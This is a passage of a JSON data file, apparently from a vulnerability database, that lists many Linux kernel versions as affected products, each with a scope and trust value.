        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.1"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel 3.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel 3.14-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 3.19-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel 3.15-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel 3.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel 3.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel 2.6.34-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
